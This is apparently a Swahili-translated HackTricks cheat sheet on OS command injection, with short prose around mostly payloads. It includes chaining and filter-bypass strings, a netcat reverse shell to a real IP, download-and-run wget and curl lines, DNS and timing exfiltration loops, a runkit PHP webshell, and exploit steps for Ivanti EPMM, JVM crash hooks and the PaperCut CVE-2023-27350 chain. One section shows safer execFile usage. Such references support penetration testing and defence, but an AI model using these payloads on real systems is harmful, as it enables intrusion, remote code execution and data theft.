Command Injection

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

Command Injection ni nini?

A command injection inaruhusu utekelezaji wa amri zozote za mfumo wa uendeshaji na mshambuliaji kwenye server inayohifadhi programu. Matokeo yake, programu na data zake zote zinaweza kuathiriwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au kudhibiti mazingira ya programu pamoja na mfumo wa msingi.

Muktadha

Kutegemea mahali ambamo ingizo lako linaingizwa unaweza kuhitaji kumaliza muktadha ulioko ndani ya nukuu (ukitumia " au ') kabla ya amri.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Injini za sheria za PHP zenye runkit zimewezeshwa

Baadhi ya programu hufanya injini za sheria za admin pekee kwa executing attacker-supplied PHP. Ikiwa mazingira yamewezesha extension ya runkit, attacker anaweza kuredefine au ku-inject functions wakati wa runtime na kupanua mhariri wa sheria unaotegemea mantiki tu hadi kuwa full PHP RCE.

Viashiria:

  • UI ya Admin inakubali PHP-like “rules” ambazo zinafanyiwa tathmini.
  • runkit / runkit7 imewekwa (phpinfo() or extension_loaded('runkit')).

Mfano wa matumizi mabaya (redefine function inayotumika na rules ili kutekeleza amri):

<?php
runkit_function_redefine('checkBid', '$bid', 'system($_GET["cmd"]); return true;');

Ikiwa yaliyomo ya kanuni yanahifadhiwa na kutathminiwa baadaye, yanageuka kuwa primitive ya RCE ya kudumu katika muktadha wa wavuti.

Vikwazo Bypasses

Ikiwa unajaribu kutekeleza amri yoyote ndani ya mashine ya linux utavutiwa kusoma kuhusu haya Bypasses:

Bypass Linux Restrictions

Mifano

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Bash tathmini ya hisabati katika RewriteMap/CGI-style scripts

RewriteMap helpers zilizoandikwa kwa bash wakati mwingine huingiza query params katika globals kisha baadaye kuzilinganisha katika muktadha wa hisabati ([[ $a -gt $b ]], $((...)), let). Upanuzi wa kihisabati hurudia kugawa tokens za yaliyomo, hivyo majina ya vigezo yanayotawaliwa na mshambulizi au marejeleo ya array yanapanuliwa mara mbili na yanaweza kusababisha utekelezaji wa amri.

Mfano ulioonekana katika Ivanti EPMM RewriteMap helpers:

  1. Vigezo vinarushwa kwa globals (stgStartTime, htheValue).
  2. Ukaguzi baadaye:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
...
fi
  1. Tuma st=theValue ili gStartTime iwe na string theValue.
  2. Tuma h=gPath['sleep 5'] ili theValue iitwe na index ya array; wakati wa ukaguzi wa kihisabati itafanya sleep 5 (badilisha kwa payload halisi).

Jaribio (~ ucheleweshaji wa 5s kisha 404 ikiwa dhaifu):

curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"

Vidokezo:

  • Tafuta helper ile ile chini ya vitangulizi vingine (kwa mfano, /mifs/c/aftstore/fob/).
  • Muktadha wa hisabati hushughulikia token zisizojulikana kama vitambulisho vya variable/array, hivyo hili linavuka vichujio rahisi vya metacharacter.

Vigezo

Hapa kuna vigezo 25 vya juu ambavyo vinaweza kuwa hatarini kwa code injection na udhaifu za RCE zinazofanana (from link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Kunasa data: herufi kwa herufi

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Inategemea zana kutoka https://github.com/HoLyVieR/dnsbin pia inapatikana kwenye dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Zana za mtandaoni za kukagua DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Unapokagua back-end za JavaScript/TypeScript, mara nyingi utakutana na API ya Node.js child_process.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() huanzisha shell (/bin/sh -c), kwa hivyo kila alama ambayo ina maana maalum kwa shell (back-ticks, ;, &&, |, $(), …) itasababisha command injection wakati input ya mtumiaji inapounganishwa kwenye string.

Kupunguza hatari: tumia execFile() (au spawn() bila chaguo la shell) na utoe kila argument kama kipengele tofauti cha array ili shell isihusika:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 ilitumika kwa urahisi kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya id_user ambayo baadaye ilinganishwa katika simu ya exec(), ikifanikisha RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with execve/execFile and no shell), many programs will still parse any argument that begins with - or -- as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.

Mahali pa kawaida ambapo hili hujitokeza:

  • UI za wavuti zilizojumuishwa / CGI handlers ambazo zinajenga amri kama ping <user>, tcpdump -i <iface> -w <file>, curl <url>, n.k.
  • Centralized CGI routers (e.g., /cgi-bin/<something>.cgi with a selector parameter like topicurl=<handler>) ambapo handlers wengi wanatumia validator dhaifu moja.

Nini kujaribu:

  • Toa thamani zinazotangulia na -/-- ili zichukuliwe kama bendera na zana inayochakata.
  • Tumia vibaya flags ambazo zinabadilisha mwenendo au kuandika faili, kwa mfano:
    • ping: -f/-c 100000 kusababisha msongo kwa kifaa (DoS)
    • curl: -o /tmp/x kuandika paths yoyote, -K <url> kupakia config inayodhibitiwa na mshambuliaji
    • tcpdump: -G 1 -W 1 -z /path/script.sh kufanikisha utekelezwaji baada ya rotate katika wrappers zisizo salama
  • Ikiwa programu inaunga mkono -- (end-of-options), jaribu kuikwepa mitigations rahisi zinazoweka -- mahali pasipo sahihi.

Generic PoC shapes against centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Callbacks za uchunguzi za JVM kwa exec iliyothibitishwa

Kilele chochote kinachokuwezesha kuingiza JVM command-line arguments (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents`, n.k.) kinaweza kubadilishwa kuwa RCE ya kuaminika bila kugusa bytecode ya programu:

  1. Lazimisha crash linalotabirika kwa kupunguza metaspace au heap: -XX:MaxMetaspaceSize=16m (au -Xmx ndogo sana). Hii inahakikishia OutOfMemoryError hata wakati wa bootstrap ya mapema.
  2. Ambatisha hook ya hitilafu: -XX:OnOutOfMemoryError="<cmd>" au -XX:OnError="<cmd>" inayotekeleza amri yoyote ya OS kila JVM inapokata.
  3. Hiari, ongeza -XX:+CrashOnOutOfMemoryError ili kuepuka jaribio za urejesho na kufanya payload iwe ya kumaliza mara moja.

Mifano ya payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Kwa sababu uchunguzi hizi zinachambuliwa na JVM yenyewe, hakuna shell metacharacters zinazohitajika na amri inatekelezwa kwa ngazi hiyo hiyo ya uadilifu kama launcher. Bug za Desktop IPC zinazopita user-supplied JVM flags (see Localhost WebSocket abuse) kwa hivyo zinatafsiriwa moja kwa moja kuwa OS command execution.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

  • Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose /app?service=page/SetupCompleted; kufungua ukurasa huo na kubofya Login hurudisha JSESSIONID halali bila sifa (authentication bypass kwenye mtiririko wa setup).
  • Katika Options → Config Editor, set print-and-device.script.enabled=Y na print.script.sandboxed=N ili kuwasha printer scripting na kuzima sandbox.
  • Kwenye tab ya Scripting ya printer, wezesha script na uache printJobHook ikifafanuliwa ili kuepuka makosa ya uhalali, lakini weka payload outside the function ili itekelezwe mara moja unapobofya Apply (hakuna print job inahitajika):
function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);
  • Badilisha callback kwa reverse shell; ikiwa UI/PoC haiwezi kushughulikia pipes/redirects, andaa payload yenye amri moja kisha uitekeleze (exec) kwa ombi la pili.
  • Horizon3’s CVE-2023-27350.py inaotomatisha auth bypass, config flips, command execution, na rollback — iendeshe kupitia upstream proxy (mfano, proxychains → Squid) wakati service inaweza kufikiwa ndani tu.

Orodha ya Ugundaji wa Brute-Force

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks